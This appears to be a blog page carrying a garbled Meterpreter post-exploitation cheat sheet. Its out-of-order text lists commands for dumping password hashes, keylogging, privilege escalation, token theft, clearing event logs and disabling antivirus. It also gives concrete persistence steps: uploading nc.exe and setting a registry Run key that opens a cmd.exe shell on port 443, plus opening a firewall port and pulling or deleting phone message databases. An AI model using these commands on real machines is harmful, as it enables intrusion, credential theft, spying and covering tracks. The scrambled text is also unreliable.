A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.Įnum_chrome.rb - Script to extract data from a chrome installation.Įnum_firefox.rb - Script for extracting data from Firefox. This info may help you target additional systems.ĭuplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. lnk files contain time stamps, file locations, including share names, volume serial #s and more. lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. Timestomp - manipulates the modify, access, and create attributes of a fileĪrp_scanner.rb - Script for performing an ARP's Scan Discovery.Īutoroute.rb - Meterpreter session without having to background the current session.Ĭheckvm.rb - Script for detecting if target host is a virtual machine.Ĭredcollect.rb - Script to harvest credentials found on the host and store them in the database.ĭomain_list_gen.rb - Script for extracting domain admin account list for use.ĭumplinks.rb - Dumplinks parses. Look for more on those on my upcoming meterpreter script cheat sheet. Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Hashdump - grabs the hashes in the password (SAM) file Getsystem - uses 15 built-in methods to gain sysadmin privileges Uictl - enables control of some of the user interface components Set_desktop - changes the meterpreter desktop Screenshot - grabs a screenshot of the meterpreter desktop Keyscan_stop - stops the software keylogger Keyscan_start - starts the software keylogger when associated with a process such as Word or browser Keyscan_dump - dumps the contents of the software keylogger Idletime - checks to see how long since the victim system has been idle Getdesktop - get the current meterpreter desktop Sysinfo - gets the details about the victim computer such as OS and nameĮnumdesktops - lists all accessible desktops Steal_token - attempts to steal the token of a specified (PID) process Shutdown - shuts down the victim's computer Shell - opens a command shell on the victim machine Rev2self - calls RevertToSelf() on the victim machine Reg - interact with the victim's registry Kill - terminate the process designated by the PID Getuid - get the user that the server is running as Getprivs - gets as many privileges as possible Getpid - gets the current process ID (PID) Route - view or modify the victim routing tableĬlearav - clears the event logs on the victimy's computer Portfwd - forwards a port on the victim system to a remote service Ipconfig - displays network interfaces with key information including IP address, etc. Upload - upload a file from the attacker system to the victim Rmdir - remove directory on the victim system Mkdir - make a directory on the victim system Run - executes the meterpreter script designated after itĬat - read and output to stdout the contents of a fileĭownload - download a file from the victim system to the attacker system Quit - terminates the meterpreter session Migrate - moves the active process to a designated PID Netsh firewall add portopening TCP 443 "Service Firewall" ENABLE ALLĭownload msgstore.db.crypt8 # will take long timeīackground - moves the current session to the backgroundīgkill - kills a background meterpreter scriptīglist - provides a list of all running background scriptsīgrun - runs a script as a background thread Reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc Reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' Reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run Upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32 #run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up_ĭelete data/data//databases/mmssms.db TOP: checkvm getcountermeasure getgui get_local_subnets gettelnet hostsedit killav remotewinenum scraper winenum
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |